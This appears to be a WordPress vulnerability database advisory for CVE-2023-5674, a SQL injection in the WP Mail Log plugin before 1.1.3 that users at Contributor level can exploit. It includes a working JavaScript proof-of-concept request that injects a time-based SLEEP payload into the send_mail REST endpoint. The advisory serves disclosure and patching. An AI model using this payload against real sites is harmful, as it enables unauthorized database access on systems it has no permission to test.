WP Mail Log < 1.1.3 – Contributor+ SQL Injection in wml_logs/send_mail endpoint | CVE 2023-5674 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Contributor.

Proof of Concept

Run the following within any page on the site. Notice that the request is delayed by the SLEEP call in the injected SQL.

var nonce = await (await fetch('/wp-admin/admin-ajax.php?action=rest-nonce')).text();

await (await fetch('/wp-json/wml/v1/wml_logs/send_mail', {method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded', 'X-WP-Nonce': nonce}, body: 'id=(SELECT IF (1=1,SLEEP(10),1))&to_email=send@example.com'})).text();

Affects Plugins

Fixed in 1.1.3

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

dc11

Submitter

dc11

Verified

Yes

WPVDB ID

32a23d0d-7ece-4870-a99d-f3f344be2d67

Timeline

Publicly Published

2023-11-28 (about 7 months ago)

Added

2023-11-28 (about 7 months ago)

Last Updated

2023-11-28 (about 7 months ago)

Other

Published

Title

Published

2023-09-22

Title

iPanorama 360 – WordPress Virtual Tour Builder < 1.8.0 - Authenticated (Admin+) SQL injection

Published

2022-05-09

Title

Note Press <= 0.1.10 - Admin+ SQLi via Bulk Actions

Published

2024-04-16

Title

SP Project & Document Manager <= 4.71 - Authenticated (Author+) SQL Injeciton

Published

2021-11-01

Title

Email Before Download < 6.8 - Admin+ SQL Injection

Published

2021-11-09

Title

LearnPress < 4.1.4 - Admin+ SQL Injection